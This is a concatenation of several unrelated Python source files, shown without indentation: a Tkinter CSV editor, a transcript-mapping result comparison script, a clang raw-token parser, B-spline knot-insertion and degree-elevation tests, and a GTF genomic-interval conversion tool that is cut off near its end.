import tkMessageBox
import tkFileDialog
import tkFont
import csv
##
# CSV GUI Editor written in python using tkinter
# - A lightweight csv editor
# - (c) 2017 <NAME> <EMAIL>
##
##
# TODO: Add + / - buttons to create/remove rows & coloumns
# TODO: Add resizing of cells
##
class Application(Frame):
cellList = []
currentCells = []
currentCell = None
def __init__(self, master=None):
Frame.__init__(self, master)
self.grid()
self.createDefaultWidgets()
def focus_tab(self, event):
event.widget.tk_focusNext().focus()
return "break"
def focus_sh_tab(self, event):
event.widget.tk_focusPrev().focus()
return "break"
def focus_right(self, event):
#event.widget.tk_focusNext().focus()
widget = event.widget.focus_get()
for i in range(len(self.currentCells)):
for j in range(len(self.currentCells[0])):
if widget == self.currentCells[i][j]:
if(j >= len(self.currentCells[0]) - 1 ):
j = -1
self.currentCells[i][j+1].focus()
return "break"
def focus_left(self, event):
#event.widget.tk_focusNext().focus()
widget = event.widget.focus_get()
for i in range(len(self.currentCells)):
for j in range(len(self.currentCells[0])):
if widget == self.currentCells[i][j]:
if(j == 0):
j = len(self.currentCells[0])
self.currentCells[i][j-1].focus()
return "break"
def focus_up(self, event):
#event.widget.tk_focusNext().focus()
widget = event.widget.focus_get()
for i in range(len(self.currentCells)):
for j in range(len(self.currentCells[0])):
if widget == self.currentCells[i][j]:
if(i < 0):
i = len(self.currentCells)
self.currentCells[i-1][j].focus()
return "break"
def focus_down(self, event):
#event.widget.tk_focusNext().focus()
widget = event.widget.focus_get()
for i in range(len(self.currentCells)):
for j in range(len(self.currentCells[0])):
if widget == self.currentCells[i][j]:
if( i >= len(self.currentCells) - 1):
i = -1
self.currentCells[i+1][j].focus()
return "break"
def selectall(self, event):
event.widget.tag_add("sel", "1.0", "end")
event.widget.mark_set(INSERT, "1.0")
event.widget.see(INSERT)
return "break"
def saveFile(self, event):
self.saveCells()
# TODO: Create bind for arrow keys and enter
def createDefaultWidgets(self):
w, h = 7, 1
self.sizeX = 4
self.sizeY = 6
self.defaultCells = []
for i in range(self.sizeY):
self.defaultCells.append([])
for j in range(self.sizeX):
self.defaultCells[i].append([])
for i in range(self.sizeY):
for j in range(self.sizeX):
tmp = Text(self, width=w, height=h)
tmp.bind("<Tab>", self.focus_tab)
tmp.bind("<Shift-Tab>", self.focus_sh_tab)
tmp.bind("<Return>", self.focus_down)
tmp.bind("<Shift-Return>", self.focus_up)
tmp.bind("<Right>", self.focus_right)
tmp.bind("<Left>", self.focus_left)
tmp.bind("<Up>", self.focus_up)
tmp.bind("<Down>", self.focus_down)
tmp.bind("<Control-a>", self.selectall)
tmp.bind("<Control-s>", self.saveFile)
#TODO: Add resize check on column when changing focus
tmp.insert(END, "")
tmp.grid(padx=0, pady=0, column=j, row=i)
self.defaultCells[i][j] = tmp
self.cellList.append(tmp)
self.defaultCells[0][0].focus_force()
self.currentCells = self.defaultCells
self.currentCell = self.currentCells[0][0]
# TODO: Add buttons to create new rows/columns
def newCells(self):
self.removeCells()
self.createDefaultWidgets()
def removeCells(self):
while(len(self.cellList) > 0):
for cell in self.cellList:
# print str(i) + str(j)
cell.destroy()
self.cellList.remove(cell)
def loadCells(self):
filename = tkFileDialog.askopenfilename(initialdir=".", title="Select file",
filetypes=(("csv files", "*.csv"), ("all files", "*.*")))
ary = []
col = -1
rows = []
# get array size & get contents of rows
with open(filename, "rb") as csvfile:
rd = csv.reader(csvfile, delimiter=",", quotechar='"')
for row in rd:
ary.append([])
col = len(row)
rows.append(row)
# create the array
for i in range(len(ary)):
for j in range(col):
ary[i].append([])
# fill the array
for i in range(len(ary)):
for j in range(col):
# print rows[i][j]
ary[i][j] = rows[i][j]
self.removeCells()
# get the max width of the cells
mx = 0
for i in range(len(ary)):
for j in range(len(ary[0])):
if(len(ary[i][j]) >= mx):
mx = len(ary[i][j])
w = mx
loadCells = []
for i in range(len(ary)):
loadCells.append([])
for j in range(len(ary[0])):
loadCells[i].append([])
# create the new cells
for i in range(len(ary)):
for j in range(len(ary[0])):
tmp = Text(self, width=w, height=1)
tmp.bind("<Tab>", self.focus_tab)
tmp.bind("<Shift-Tab>", self.focus_sh_tab)
tmp.bind("<Return>", self.focus_down)
tmp.bind("<Shift-Return>", self.focus_up)
tmp.bind("<Right>", self.focus_right)
tmp.bind("<Left>", self.focus_left)
tmp.bind("<Up>", self.focus_up)
tmp.bind("<Down>", self.focus_down)
tmp.bind("<Control-a>", self.selectall)
tmp.bind("<Control-s>", self.saveFile)
tmp.insert(END, ary[i][j])
if(i == 0):
tmp.config(font=("Helvetica", 10, tkFont.BOLD))
tmp.config(relief=FLAT, bg=app.master.cget('bg'))
loadCells[i][j] = tmp
tmp.focus_force()
self.cellList.append(tmp)
tmp.grid(padx=0, pady=0, column=j, row=i)
self.currentCells = loadCells
self.currentCell = self.currentCells[0][0]
def saveCells(self):
filename = tkFileDialog.asksaveasfilename(initialdir=".", title="Save File", filetypes=(
("csv files", "*.csv"), ("all files", "*.*")), defaultextension=".csv")
vals = []
for i in range(len(self.currentCells)):
for j in range(len(self.currentCells[0])):
vals.append(self.currentCells[i][j].get(1.0, END).strip())
with open(filename, "wb") as csvfile:
for rw in range(len(self.currentCells)):
row = ""
for i in range(len(self.currentCells[0])):
x = rw * len(self.currentCells[0])
if(i != len(self.currentCells[0]) - 1):
row += vals[x + i] + ","
else:
row += vals[x + i]
csvfile.write(row + "\n")
tkMessageBox.showinfo("", "Saved!")
# End Application Class #
# Begin functions #
def hello():
tkMessageBox.showinfo("", "Hello!")
# End functions #
### CODE ENTRY ###
app = Application()
menubar = Menu(app)
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label="New", command=app.newCells) # add save dialog
# add save dialog
filemenu.add_command(label="Open", command=app.loadCells)
filemenu.add_command(label="Save as", command=app.saveCells)
filemenu.add_command(label="Exit", command=app.quit)
menubar.add_cascade(label="File", menu=filemenu)
menubar.add_command(label="Exit", command=app.quit)
app.master.title('CSV Editor')
app.master.config(menu=menubar)
default_font = tkFont.nametofont("TkTextFont")
default_font.configure(family="Helvetica")
app.option_add("*Font", default_font)
app.mainloop()
|
<filename>compare_results.py
import os
import sys
import random
import time
from random import seed, randint
import argparse
import platform
from datetime import datetime
import imp
import numpy as np
import fileinput
from itertools import product
import pandas as pd
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from os import listdir
from scipy.interpolate import griddata
import matplotlib as mpl
from Bio.PDB.Polypeptide import one_to_three
from Bio.PDB.Polypeptide import three_to_one
from Bio.PDB.PDBParser import PDBParser
from collections import defaultdict
from Bio import SeqIO
from io import StringIO
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna
from helper_functions import *
parser = argparse.ArgumentParser(description="This is my playground for current project")
# parser.add_argument("protein", help="the name of protein")
# parser.add_argument("template", help="the name of template file")
parser.add_argument("-s", "--solution", type=str, default="test_nov16/GMAP_combined_nov06_post_modification_4.tsv")
parser.add_argument("-v", "--validation", type=str, default="dev_validation_set.tsv")
args = parser.parse_args()
with open('cmd_compare_results.txt', 'a') as f:
f.write(' '.join(sys.argv))
f.write('\n')
# fileLocation = "dev_validation_set.tsv"
fileLocation = args.validation
dev_validation_set = read_result(fileLocation)
# fileLocation = "test/GMAP_combined_nov06_post_modification_3.tsv"
fileLocation = args.solution
mySolution = read_result(fileLocation)
# only consider sourceA is A for now.
# ground_truth = dev_validation_set.query("SourceA == 'B'")
ground_truth = dev_validation_set
print(len(ground_truth))
print(len(mySolution))
my_summary = {}
def compare_result(call, ground_truth, mySolution, my_summary):
print(pad_with_dash(f"should be {call}"))
count = 0
correct_count = 0
for i, line in ground_truth.query(f"Call == '{call}'").reset_index(drop=True).iterrows():
# print(i)
SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
call = line["Call"]
solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
if len(solution) == 0:
ref = "\t".join(line.values.astype(str))
sol = "None"
elif len(solution) > 1:
ref = "\t".join(line.values.astype(str))
# print("ref:\n"+ref)
sol = ""
for j, one_sol in solution.iterrows():
sol += "\t".join(one_sol.values.astype(str)) + '\n'
# print("mySolution:\n"+sol)
else:
solution = solution.iloc[0]
if np.alltrue(line.values.astype(str)[:8] == solution.values.astype(str)[:8]):
# the all same.
correct_count += 1
continue
else:
ref = "\t".join(line.values.astype(str))
sol = "\t".join(solution.values.astype(str))
count += 1
print("----------")
print("ref:\n"+ref)
print("mySolution:\n"+sol)
print("----------")
print("Correct: ", correct_count, "Wrong: ", count)
my_summary[f"wrong_{call}"] = count
my_summary[f"correct_{call}"] = correct_count
def compare_multiple_result(ground_truth, mySolution, my_summary):
call = "multiple_transcript"
print(pad_with_dash(f"should be {call}"))
count = 0
correct_count = 0
sourceA_list = ground_truth.query(f"Call == '{call}'")["SourceA_Transcript_ID"].unique()
for SourceA_Transcript_ID in sourceA_list:
a = ground_truth.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
toTranscript_ground_truth = sorted(a["SourceB_Transcript_ID"])
toTranscript_solution = sorted(solution["SourceB_Transcript_ID"])
for toTranscript_solution_i in toTranscript_solution:
if toTranscript_solution_i not in toTranscript_ground_truth:
line = solution.query(f"SourceB_Transcript_ID == '{toTranscript_solution_i}'")
assert len(line) == 1
line = line.iloc[0]
# print(toTranscript_solution_i, "Not exist in ground truth")
# print(line)
sol = "\t".join(line.values.astype(str))
ref = ""
print("ref:\n"+ref)
print("mySolution:\n"+sol)
count += 1
for toTranscript_ground_truth_i in toTranscript_ground_truth:
if toTranscript_ground_truth_i not in toTranscript_solution:
# print(toTranscript_ground_truth_i, "Not found in my solution")
line = a.query(f"SourceB_Transcript_ID == '{toTranscript_ground_truth_i}'")
assert len(line) == 1
line = line.iloc[0]
ref = "\t".join(line.values.astype(str))
sol = "None"
# sol_line = mySolution.query(f"SourceA_Transcript_ID == '{toTranscript_ground_truth_i}'")
# sol = ""
# for j, one_sol in sol_line.iterrows():
# sol += "\t".join(one_sol.values.astype(str)) + '\n'
# try:
# sol = "\t".join(sol_line.values.astype(str))
# except:
# print("unknown problem")
# print(sol_line)
# sol = "Error"
print("ref:\n"+ref)
print("mySolution:\n"+sol)
count += 1
correct_count = len(ground_truth.query(f"Call == '{call}'")) - count
print("Correct: ", correct_count, "Wrong: ", count)
my_summary[f"wrong_{call}"] = count
my_summary[f"correct_{call}"] = correct_count
compare_result("unique_transcript", ground_truth, mySolution, my_summary)
# compare_result("multiple_transcript", ground_truth, mySolution, my_summary)
compare_multiple_result(ground_truth, mySolution, my_summary)
compare_result("gene_fusion", ground_truth, mySolution, my_summary)
compare_result("absent_transcript", ground_truth, mySolution, my_summary)
compare_result("absent_gene", ground_truth, mySolution, my_summary)
compare_result("absent_genome", ground_truth, mySolution, my_summary)
print("---------------exist in reference but not in my solution-----------------")
count = 0
for i, line in ground_truth.iterrows():
SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
call = line["Call"]
solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
if len(solution) == 0:
# print(SourceA_Transcript_ID, call)
ref = "\t".join(line.values.astype(str))
print("ref:\n"+ref)
print("mySolution:")
# sol = "\t".join(solution.values.astype(str))
print("None")
count += 1
print("Occurrence: ", count)
my_summary["exist_in_ground_truth_but_not_in_my_solution"] = count
# print("---------------matched more than one-----------------")
# count = 0
# for i, line in ground_truth.iterrows():
# SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
# call = line["Call"]
# solution = mySolution.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
# if len(solution) > 1:
# ref = "\t".join(line.values.astype(str))
# print("ref:\n"+ref)
# print("mySolution:")
# for one_sol in solution.values:
# sol = "\t".join(one_sol.astype(str))
# print(sol)
# count += 1
# print("Occurrence: ", count)
# my_summary["matched_more_than_one"] = count
# print("---------------in my solution but not in reference-----------------")
# count = 0
# for i, line in mySolution.iterrows():
# SourceA_Transcript_ID = line["SourceA_Transcript_ID"]
# call = line["Call"]
# ref = ground_truth.query(f"SourceA_Transcript_ID == '{SourceA_Transcript_ID}'")
# if len(ref) == 0:
# ref = "None"
# print("ref:\n"+ref)
# sol = "\t".join(line.values.astype(str))
# print("mySolution:\n"+sol)
# count += 1
# print("Occurrence: ", count)
# my_summary["in_my_solution_but_not_in_ref"] = count
print(pad_with_dash("summary"))
total = 0
for item in my_summary:
total += my_summary[item]
print(item, my_summary[item])
print(total) |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys, os, re
from BAClangUtils.ShellUtil import ShellUtil
class RawTokenUtil(object):
def __init__(self):
super(RawTokenUtil, self).__init__()
def __resolveLine(self, lineContent):
if lineContent == None or isinstance(lineContent, str) == False or len(lineContent) < 1:
return None
if re.match("^unknown ('|\"){1,1}(.*)?$", lineContent, re.S) != None:
return None
tmpLineContent = lineContent
uncleanContent = None
uncleanContentFinds = re.finditer('\[UnClean=(.|\s)*?\]', tmpLineContent)
for findItem in uncleanContentFinds:
uncleanContent = tmpLineContent[findItem.start()+10: findItem.end()-2]
break
tmpLineContent = tmpLineContent.replace('[StartOfLine]', '')
if uncleanContent != None:
tmpLineContent = re.sub('\[UnClean=(.|\s)*?\]', '', tmpLineContent)
blankIndexs = []
blanksRegFinds = re.finditer('( |\t)', tmpLineContent)
for blankItem in blanksRegFinds:
blankIndexs.append(blankItem.start())
lineClass = tmpLineContent[0: blankIndexs[0]]
locationTmp = tmpLineContent[blankIndexs[len(blankIndexs) - 1] + 1 : len(tmpLineContent) - 1]
colonIndexs = []
colonFinds = re.finditer(':', locationTmp)
for colonItem in colonFinds:
colonIndexs.append(colonItem.start())
locationLine = int(locationTmp[colonIndexs[0] + 1: colonIndexs[1]])
locationColumn = int(locationTmp[colonIndexs[1] + 1: len(locationTmp) - 1]) - 1
tmpLineContent = tmpLineContent[blankIndexs[0]: blankIndexs[len(blankIndexs) - 1]]
tmpLineContent = re.sub('^(\t| )*?(\'|\"){1,1}', '', tmpLineContent)
tmpLineContent = re.sub('(\'|\"){1,1}(\t| )*?$', '', tmpLineContent)
result = {}
result['content'] = tmpLineContent
result['unCleanContent'] = uncleanContent if uncleanContent != None else tmpLineContent
result['class'] = lineClass
result['line'] = locationLine
result['column'] = locationColumn
return result
def parse(self, sourcePath):
if sourcePath == None or isinstance(sourcePath, str) == False or len(sourcePath) == 0:
return None, None
if os.path.exists(sourcePath) == False or os.path.isdir(sourcePath) == True:
return None, None
cmdResult = ShellUtil.runShell('clang -Xclang -dump-raw-tokens ' + sourcePath)
if cmdResult == None:
return None, None
cmdResultOutput = cmdResult['output']
cmdResultError = cmdResult['error']
lineRegExpress = '(.|\n|\s)*?Loc=<(.)*?:[0-9]*?:[0-9]*?>\\n'
outputResult = []
if cmdResultOutput != None:
outputLineFinds = re.finditer(lineRegExpress, cmdResultOutput)
for lineItem in outputLineFinds:
lineContent = cmdResultOutput[lineItem.start(): lineItem.end()]
resultTmp = self.__resolveLine(lineContent)
if resultTmp != None:
outputResult.append(resultTmp)
errorResult = []
if cmdResultError != None:
errorLineFinds = re.finditer(lineRegExpress, cmdResultError)
for lineItem in errorLineFinds:
lineContent = cmdResultError[lineItem.start(): lineItem.end()]
resultTmp = self.__resolveLine(lineContent)
if resultTmp != None:
errorResult.append(resultTmp)
return outputResult, errorResult |
import bootstrap
import numpy as np
from igakit.igalib import bsp
def test_crv_ki(PLOT=0):
p = 2
U = np.asarray([0,0,0, 1,1,1], dtype=float)
n = len(U)-1-(p+1)
Pw = np.zeros((n+1,3))
Pw[0,:] = [0.0, 1.0, 1.0]
Pw[1,:] = [1.0, 1.0, 1.0]
Pw[2,:] = [1.0, 0.0, 1.0]
Pw[1,:] *= np.sqrt(2)/2
X = np.asarray([0.25,0.5,0.5,.8,.9])
Ubar, Qw = bsp.RefineKnotVector(p,U,Pw,X)
u = np.linspace(U[0], U[-1], 31)
Cw = bsp.Evaluate1(p,Ubar,Qw,u)
Dw = bsp.Evaluate1(p,Ubar,Qw,Ubar)
P = Qw[:,:2] / Qw[:,2, None]
C = Cw[:,:2] / Cw[:,2, None]
D = Dw[:,:2] / Dw[:,2, None]
if not PLOT: return
plt.figure()
plt.title("Curve - Knot Insertion")
x1 = C[:,0]
y1 = C[:,1]
plt.plot(x1,y1,'.b')
x2 = D[:,0]
y2 = D[:,1]
plt.plot(x2,y2,'og')
x0 = P[:,0]
y0 = P[:,1]
plt.plot(x0,y0,'sr')
t = np.linspace(0,np.pi/2,100)
a = np.cos(t)
b = np.sin(t)
plt.plot(a,b,'-k')
plt.axis("equal")
def test_crv_de(PLOT=0):
p = 2
U = np.asarray([0,0,0, 1,1,1], dtype=float)
n = len(U)-1-(p+1)
Pw = np.zeros((n+1,3))
Pw[0,:] = [0.0, 1.0, 1.0]
Pw[1,:] = [1.0, 1.0, 1.0]
Pw[2,:] = [1.0, 0.0, 1.0]
Pw[1,:] *= np.sqrt(2)/2
X = np.asarray([0.5])
U, Pw = bsp.RefineKnotVector(p,U,Pw,X)
#t = 1
#U, Pw = bsp.DegreeElevate(p,U,Pw,t)
#p = p + t
t = 2
Uh, Qw = bsp.DegreeElevate(p,U,Pw,t)
ph = p + t
u = np.linspace(U[0], U[-1], 31)
Cw = bsp.Evaluate1(ph,Uh,Qw,u)
Dw = bsp.Evaluate1(ph,Uh,Qw,Uh)
P = Qw[:,:2] / Qw[:,2, None]
C = Cw[:,:2] / Cw[:,2, None]
D = Dw[:,:2] / Dw[:,2, None]
if not PLOT: return
plt.figure()
plt.title("Curve - Degree Elevation")
x1 = C[:,0]
y1 = C[:,1]
plt.plot(x1,y1,'.b')
x2 = D[:,0]
y2 = D[:,1]
plt.plot(x2,y2,'og')
x0 = P[:,0]
y0 = P[:,1]
plt.plot(x0,y0,'sr')
t = np.linspace(0,np.pi/2,100)
a = np.cos(t)
b = np.sin(t)
plt.plot(a,b,'-k')
plt.axis("equal")
if __name__ == '__main__':
try:
from matplotlib import pylab as plt
PLOT=1
except ImportError:
PLOT=0
if 1: test_crv_ki(PLOT=PLOT)
if 1: test_crv_de(PLOT=PLOT)
if PLOT: plt.show()
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Operations on genomic intervals stored in GTF file
note:
- all the exons of a gene should be on the same strand. Genes with exons trans-
spliced from the other strand, like mod(mdg4) in D. melanogaster, should be
excluded (before or after).
- stop codon is not part of the CDS, at least for Ensembl GTF
-----------------------------------------------------------------
@author: zh (mt1022)
@date: Fri Aug 27 2021
"""
import sys
import argparse
import re
import gzip
import fileinput
import csv
from dataclasses import dataclass
from typing import List
###############################################################################
# class definiton #############################################################
###############################################################################
@dataclass
class Region:
start: int
end: int
def __post_init__(self):
if self.start > self.end:
raise ValueError('Invalid region boundary!')
def __len__(self):
return self.end - self.start + 1
@dataclass
class Gene:
gene_id: str
chrom: str = ''
strand: str = '+'
class Transcript:
def __init__(self, tx_id: str, gene: Gene):
self.tx_id: str = tx_id
self.gene: Gene = gene
self.exons: List[Region] = []
self.cdss: List[Region] = []
self.stop_codon: List[Region] = []
def add_region(self, region, region_type):
if region_type == 'exon':
self.exons.append(region)
elif region_type == 'CDS':
self.cdss.append(region)
elif region_type == 'stop_codon':
self.stop_codon.append(region)
return
def update(self):
"""
Update the order of regions so that operations related to intervals can
work correctly.
"""
self.exons = sorted(self.exons, key=lambda r: r.start)
self.cdss = sorted(self.cdss, key=lambda r: r.start)
self.stop_codon = sorted(self.stop_codon, key=lambda r: r.start)
return
def __len__(self):
return sum(len(i) for i in self.exons)
@property
def n_exons(self):
return len(self.exons)
@property
def cds_len(self):
return sum(len(i) for i in self.cdss)
@property
def tx_start(self):
if self.gene.strand == '+':
return self.exons[0].start
else:
return self.exons[-1].end
@property
def tx_end(self):
if self.gene.strand == '+':
return self.exons[-1].end
else:
return self.exons[0].start
@property
def cds_start(self):
if len(self.cdss) == 0:
return None
elif self.gene.strand == '+':
return self.cdss[0].start
else:
return self.cdss[-1].end
@property
def cds_end(self):
if len(self.cdss) == 0:
return None
elif self.gene.strand == '+':
return self.cdss[-1].end
else:
return self.cdss[0].start
@property
def stop_codon_start(self):
if len(self.stop_codon) == 0:
return None
elif self.gene.strand == '+':
return self.stop_codon[-1].end
else:
return self.stop_codon[0].start
@property
def stop_codon_end(self):
if len(self.stop_codon) == 0:
return None
elif self.gene.strand == '+':
return self.stop_codon[-1].end
else:
return self.stop_codon[0].start
@property
def introns(self):
if len(self.exons) == 1:
return []
else:
return [Region(self.exons[i].end + 1, self.exons[i+1].start - 1)
for i in range(self.n_exons - 1)]
def tpos_to_gpos(self, pos: int):
"""
transform transcript coordinate to genomic coordinate
param pos: int, position on transcript, 1-based.
"""
if pos < 1:
return 0
elif pos > len(self):
return -1
else:
if self.gene.strand == '-':
pos = len(self) - pos + 1
for i in range(self.n_exons):
if len(self.exons[i]) < pos:
pos -= len(self.exons[i])
else:
return self.exons[i].start + pos - 1
def gpos_to_tpos(self, pos):
"""
transform genomic coordinate to transcript coordinate
param pos: int, position on genome, 1-based.
"""
if pos < self.exons[0].start:
tpos = self.exons[0].start - pos
ptype = 'upstream' if self.gene.strand == '+' else 'downstream'
return tpos, ptype
elif pos > self.exons[-1].end:
tpos = pos - self.exons[-1].end
ptype = 'downstream' if self.gene.strand == '+' else 'upstream'
return tpos, ptype
else:
tpos = 0
for i in range(self.n_exons):
if self.exons[i].start <= pos:
if self.exons[i].end <= pos:
tpos += len(self.exons[i])
else:
tpos += pos - self.exons[i].start + 1
else:
if self.exons[i-1].end < pos:
if self.gene.strand == '+':
ptype = 'intron_' + str(i)
tpos = pos - self.exons[i - 1].end
else:
ptype = 'intron_' + str(len(self.exons) - i)
tpos = self.exons[i].start - pos
return tpos, ptype
break
ptype = 'exon'
tpos = tpos if self.gene.strand == '+' else len(self) - tpos + 1
return tpos, ptype
def cpos_to_gpos(self, pos):
"""
transform CDS coordinate to genomic coordinate
param pos: int position on CDS, 1-based.
"""
tpos = self.gpos_to_tpos(self.cds_start)[0] + pos - 1
gpos = self.tpos_to_gpos(tpos)
return gpos
def gpos_to_cpos(self, pos):
"""
transform genomic coordinate to CDS coordinate
param: int, position on genome, 1-based.
"""
tpos = self.gpos_to_tpos(pos)[0]
cpos = tpos - self.gpos_to_tpos(self.cds_start)[0] + 1
return cpos
def tiv_to_giv(self, pos1, pos2):
"""
given transcript region boundary:
return one or more(for features spanning more than one exon)
exonic region interval(s) in list of string interval
param pos1: int, left transcript coordinate, 1-based.
param pos2: int, right transcript coordinate, 1-based.
"""
cod1 = self.tpos_to_gpos(pos1)
cod2 = self.tpos_to_gpos(pos2)
start = min(cod1, cod2)
end = max(cod1, cod2)
givs = []
for i in range(self.n_exons):
if self.exons[i].end < start:
continue
if self.exons[i].start > end:
break
if self.exons[i].start <= start:
if self.exons[i].end <= end:
givs.append(Region(start, self.exons[i].end))
else:
givs.append(Region(start, end))
else:
if self.exons[i].end <= end:
givs.append(Region(self.exons[i].start, self.exons[i].end))
else:
givs.append(Region(self.exons[i].start, end))
return givs
@property
def five_prime_utrs(self):
if len(self.cdss) == 0 or self.cds_start == self.tx_start:
return []
else:
return self.tiv_to_giv(1, self.gpos_to_tpos(self.cds_start)[0] - 1)
@property
def three_prime_utrs(self):
if len(self.cdss) == 0 or self.stop_codon_end == self.tx_end or self.cds_end == self.tx_end:
return []
else:
if len(self.stop_codon) > 0:
return self.tiv_to_giv(self.gpos_to_tpos(self.stop_codon_end)[0] + 1, len(self))
else:
return self.tiv_to_giv(self.gpos_to_tpos(self.cds_end)[0] + 1, len(self))
def format_region_bed12(self, rs, flank=0):
"""
format a spliced region in a transcript into bed12 format
param rs: a list of items of class Region
"""
rs = sorted(rs, key=lambda r: r.start)
if flank > 0:
rs[0].start -= flank
rs[-1].end += flank
starts = [r.start - 1 for r in rs]
ends = [r.end for r in rs]
blockstart = [str(x - starts[0]) for x in starts]
blocksize = [str(len(r)) for r in rs]
s = [self.gene.chrom, starts[0], ends[-1], self.tx_id, self.gene.gene_id,
self.gene.strand, '0', '0', '0', len(starts)]
s = s + [','.join(blocksize) + ',', ','.join(blockstart) + ',']
return s
###############################################################################
# functions ###################################################################
###############################################################################
def parse_gtf(gtf_file):
"""
read GTF file
param: path to GTF file, gzipped format allowed.
"""
gtf = {}
if gtf_file.endswith('.gz'):
f = gzip.open(gtf_file, 'rt')
elif gtf_file == '-':
f = sys.stdin
else:
f = open(gtf_file)
for line in f:
if line[0] == '#':
continue
ary = line.strip().split('\t')
m = re.search(r'gene_id "(.*?)".*?transcript_id "(.*?)"', ary[8])
if m:
if m.group(2) in gtf:
gtf[m.group(2)].add_region(region = Region(int(ary[3]), int(ary[4])), region_type=ary[2])
else:
gene = Gene(gene_id=m.group(1), chrom=ary[0], strand=ary[6])
tx = Transcript(tx_id=m.group(2), gene=gene)
tx.add_region(region = Region(int(ary[3]), int(ary[4])), region_type=ary[2])
gtf[m.group(2)] = tx
f.close()
for tx in gtf:
gtf[tx].update()
return gtf
def exon_to_bed(gtf_file, extend=0):
"""
print exons of each transcript in bed12 format
param: path to GTF file, gzipped format allowed.
"""
gtf = parse_gtf(gtf_file)
for tx_id in gtf:
tx = gtf[tx_id]
items = tx.format_region_bed12(tx.exons, flank=extend)
print('\t'.join(str(i) for i in items))
return
def cds_to_bed(gtf_file, extend=0):
"""
print CDSs of each transcript in bed12 format
param: path to GTF file, gzipped format allowed.
"""
gtf = parse_gtf(gtf_file)
for tx_id in gtf:
tx = gtf[tx_id]
if len(tx.cdss) > 0:
items = tx.format_region_bed12(tx.cdss, flank=extend)
print('\t'.join(str(i) for i in items))
return
def utr5_to_bed(gtf_file, extend=0):
"""
print UTR5 of each transcript in bed12 format
param: path to GTF file, gzipped format allowed.
"""
gtf = parse_gtf(gtf_file)
for tx_id in gtf:
tx = gtf[tx_id]
tx_utr5 = tx.five_prime_utrs
if len(tx_utr5) > 0:
items = tx.format_region_bed12(tx_utr5)
print('\t'.join(str(i) for i in items))
return
def utr3_to_bed(gtf_file, extend=0):
"""
print UTR3 of each transcript in bed12 format
param: path to GTF file, gzipped format allowed.
"""
gtf = parse_gtf(gtf_file)
for tx_id in gtf:
tx = gtf[tx_id]
tx_utr3 = tx.three_prime_utrs
if len(tx_utr3) > 0:
items = tx.format_region_bed12(tx_utr3, flank=extend)
print('\t'.join(str(i) for i in items))
return
def t2g(gtf_file, tfile):
"""
convert transcript coordinates to genomic coordinates
param: path to GTF file, gzipped format allowed.
param tfile: tab-delimited file, 1st column=tx, 2nd column = tpos
"""
gtf = parse_gtf(gtf_file)
with open(tfile) as fh:
for row in csv.reader(fh, delimiter="\t"):
try:
tx = gtf[row[0]]
gpos = tx.tpos_to_gpos(int(row[1]))
row += [tx.gene.chrom, tx.gene.strand, str(gpos)]
except KeyError:
print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
row += ['NA'] * 3
print('\t'.join(row))
return
def g2t(gtf_file, gfile):
"""
convert genomic coordinates ot transcript coordinates
param: path to GTF file, gzipped format allowed.
param gfile: tab-delimited file, 1st column=tx, 2nd column = gpos
"""
gtf = parse_gtf(gtf_file)
with open(gfile) as fh:
for row in csv.reader(fh, delimiter='\t'):
try:
tx = gtf[row[0]]
tpos, ptype = tx.gpos_to_tpos(int(row[1]))
row += [str(tpos), ptype]
except KeyError:
print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
row += ['NA'] * 2
print('\t'.join(row))
return
def tiv2giv(gtf_file, tivfile):
"""
convert transcript intervals to genomic intervals
param: path to GTF file, gzipped format allowed.
param tivfile: tab-delimited, first three columns are tx_id, start, and end, 1-based
"""
gtf = parse_gtf(gtf_file)
with open(tivfile) as fh:
for row in csv.reader(fh, delimiter='\t'):
try:
tx = gtf[row[0]]
givs = tx.tiv_to_giv(int(row[1]), int(row[2]))
print('\t'.join(str(i) for i in tx.format_region_bed12(givs)))
except KeyError:
print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
return
def giv2tiv(gtf_file, givfile):
"""
convert genomic intervals to transcript intervals
param: path to GTF file, gzipped format allowed.
param givfile: tab-delimited, first three columns are tx_id, start, and end, 1-based
"""
gtf = parse_gtf(gtf_file)
with open(givfile) as fh:
for row in csv.reader(fh, delimiter='\t'):
try:
tx = gtf[row[0]]
if tx.gene.strand == '+':
tiv_l = list(tx.gpos_to_tpos(int(row[1])))
tiv_r = list(tx.gpos_to_tpos(int(row[2])))
else:
tiv_l = list(tx.gpos_to_tpos(int(row[2])))
tiv_r = list(tx.gpos_to_tpos(int(row[1])))
tiv = [str(tiv_l[0]), str(tiv_r[0]), tiv_l[1], tiv_r[1]]
row += tiv
except KeyError:
row += ['NA'] * 4
print('Tx isoform {} was not found in GTF file!'.format(row[0]), file=sys.stderr)
print('\t'.join(row))
return
def tx_info(gtf_file):
"""
print summary information of each transcript
param: path to GTF file, gzipped format allowed.
note: stop codon is counted for CDS length, so that cds + utr5 + utr3 = transcript length
"""
gtf = parse_gtf(gtf_file)
header = ['tx_id', 'gene_id', 'chrom', 'strand', 'len', 'len_cds', 'len_utr5', 'len_utr3']
print('\t'.join(header))
for tx_id in gtf:
tx = gtf[tx_id]
out = [tx.tx_id, tx.gene.gene_id, tx.gene.chrom, tx.gene.strand]
len_tx = len(tx)
len_utr5 = sum(len(i) for i in tx.five_prime_utrs)
len_cds = sum(len(i) for i in tx.cdss) + sum(len(i) for i in tx.stop_codon)
len_utr3 = len_tx - len_cds - len_utr5
out += [str(i) for i in [len_tx, len_cds, len_utr5, len_utr3]]
print('\t'.join(out))
return
if __name__ == "__main__":
# parent parser that holds common argument
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('-g', '--gtf',
type=str, default='-', help='input gtf file')
